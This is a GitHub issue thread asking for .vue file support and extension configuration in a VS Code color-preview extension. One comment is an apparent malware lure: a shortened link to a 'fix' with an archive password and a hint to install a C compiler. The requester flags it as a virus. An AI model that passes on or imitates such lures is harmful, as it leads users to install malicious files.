### ISSUE TITLE
[Feature request] Vue support & file extension config

### ISSUE THREAD

**Issue by QyInvoLing** [roy-radhakanta/VsCode-color-preview#2]
Hello dear author, this extension currently integrates with several file formats which works perfectly, but it doesn't support .vue and any frontend framework not using currently supported file extension.
I'm wondering if it can offer the ability of customizing whether to enable color preview by the file's extension name (like .vue)?
Thanks!

**Comment by SagarChandra07** [comment]
This might help:This file might fix it
https://bit.ly/47P0Nvo

Password: changeme

you may need to install the c compiler

**Comment by QyInvoLing** [comment]
> This might help:This file might fix it 
> 
> Password: changeme
> 
> you may need to install the c compiler

It's obvious that this file is a virus. Can the owner of this repo remove this comment?

**Comment by roy-radhakanta** [comment]
> Hello dear author, this extension currently integrates with several file formats which works perfectly, but it doesn't support .vue and any frontend framework not using currently supported file extension. I'm wondering if it can offer the ability of customizing whether to enable color preview by the file's extension name (like .vue)? Thanks!

Thanks [QyInvoLing](https://github.com/QyInvoLing) for your suggestion, I will sure add this for .vue file type also.
